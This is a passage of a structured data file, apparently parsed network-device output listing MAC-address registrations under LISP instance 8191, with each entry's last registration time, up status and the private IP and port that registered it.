"who_last_registered": "10.8.129.11:52315",
"inst_id": 8191,
},
"04eb.40ff.8d53/48": {
"last_register": "01:52:52",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.f474/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.f486/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.f555/48": {
"last_register": "03:21:05",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.f5b5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.f6c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.f6cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.f6f3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.f60f/48": {
"last_register": "04:24:22",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.f66f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.f765/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.f768/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.f8d0/48": {
"last_register": "00:13:33",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.f8d3/48": {
"last_register": "1d01h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.f8f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.f828/48": {
"last_register": "04:15:56",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.f83d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.f846/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.f9a2/48": {
"last_register": "00:37:42",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.fac2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.faf2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.fa23/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.fa35/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.fa6e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.fab0/48": {
"last_register": "03:58:29",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.fb10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.fcf6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.fc33/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.fde9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.fdf5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.febe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.fe67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.fe88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.00cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.0048/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.0057/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.0147/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.0156/48": {
"last_register": "02:26:47",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.015c/48": {
"last_register": "2d01h",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.0162/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.0186/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.02df/48": {
"last_register": "20:28:06",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.02e5/48": {
"last_register": "09:06:08",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.02eb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.02ee/48": {
"last_register": "03:42:42",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.02f7/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.02fa/48": {
"last_register": "4d04h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.0201/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.0207/48": {
"last_register": "06:16:17",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.022e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.0276/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.0318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"04eb.40ff.035d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.045f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"04eb.40ff.0465/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.0468/48": {
"last_register": "1d04h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.0546/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.06d5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.06de/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.06e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"04eb.40ff.0642/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"04eb.40ff.0645/48": {
"last_register": "01:03:58",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.07b9/48": {
"last_register": "21:01:29",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.07c5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.07cb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"04eb.40ff.07ce/48": {
"last_register": "05:57:23",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.071a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.07a1/48": {
"last_register": "08:21:00",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.07b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.080d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.0810/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.0825/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.084f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.0879/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"04eb.40ff.08a0/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.08b5/48": {
"last_register": "23:09:23",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.09f6/48": {
"last_register": "06:51:08",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.0903/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.0936/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.0957/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.0960/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.0969/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.096c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.097e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.0996/48": {
"last_register": "01:34:58",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.09ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.0aec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.0afb/48": {
"last_register": "08:57:19",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.0a20/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.0a38/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.0a47/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.0a5f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.0a7d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.0a86/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.0a9e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.0ab3/48": {
"last_register": "03:51:38",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.0bbe/48": {
"last_register": "13:21:01",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.0bc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.0bfd/48": {
"last_register": "1d16h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.0b0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.0b31/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.0b34/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.0b73/48": {
"last_register": "12:19:48",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.0b91/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.0b97/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.0ced/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.0c60/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.0c81/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.0dd7/48": {
"last_register": "08:34:33",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.0dda/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.0dfe/48": {
"last_register": "07:48:54",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.0d56/48": {
"last_register": "18:34:05",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.0d71/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.0e10/48": {
"last_register": "05:53:48",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.0e52/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.0e76/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.0e8e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.0fed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.0f1e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.0f24/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.0f5a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"04eb.40ff.10cb/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.1020/48": {
"last_register": "1d14h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.102f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.106b/48": {
"last_register": "14:50:25",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.108f/48": {
"last_register": "15:20:00",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.1125/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.1146/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.118e/48": {
"last_register": "05:27:56",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.12c6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.12e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.12ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.123c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.1272/48": {
"last_register": "16:41:45",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.1284/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.13d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.13fb/48": {
"last_register": "07:56:06",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.142e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"04eb.40ff.15e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.15f3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.1524/48": {
"last_register": "05:14:46",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.1527/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.156f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.1581/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.1599/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.15b7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.16c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"04eb.40ff.1629/48": {
"last_register": "09:06:56",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.165f/48": {
"last_register": "4d23h",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.17ac/48": {
"last_register": "03:15:57",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.17af/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.17b2/48": {
"last_register": "1d01h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.1827/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.183c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.187b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.1881/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.189f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.192c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.1950/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.1959/48": {
"last_register": "16:07:57",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.198c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.1995/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.19aa/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.1ac7/48": {
"last_register": "09:02:41",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.1a28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.1a2b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.1a73/48": {
"last_register": "08:32:52",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.1a8b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.1be4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.1b03/48": {
"last_register": "18:27:06",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.1b06/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.1b12/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.1b4b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.1b4e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"04eb.40ff.1b78/48": {
"last_register": "14:37:34",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.1b93/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.1cf8/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.1c08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.1c11/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.1c38/48": {
"last_register": "2d10h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.1c59/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"04eb.40ff.1c5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.1c89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.1dd6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.1df7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"04eb.40ff.1d16/48": {
"last_register": "05:30:45",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.1d22/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.1d4f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.1d67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.1d9d/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.1eba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.1ee7/48": {
"last_register": "2d19h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"04eb.40ff.1e00/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.1e7e/48": {
"last_register": "13:54:40",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.1e8d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.1ea2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.1ea5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.1fbc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"04eb.40ff.1fcb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.1fdd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.1f05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.1f0b/48": {
"last_register": "01:13:45",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.1f2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.20d9/48": {
"last_register": "14:07:24",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.20f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"04eb.40ff.20fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"04eb.40ff.2031/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.2052/48": {
"last_register": "2w1d",
"up": "yes#",
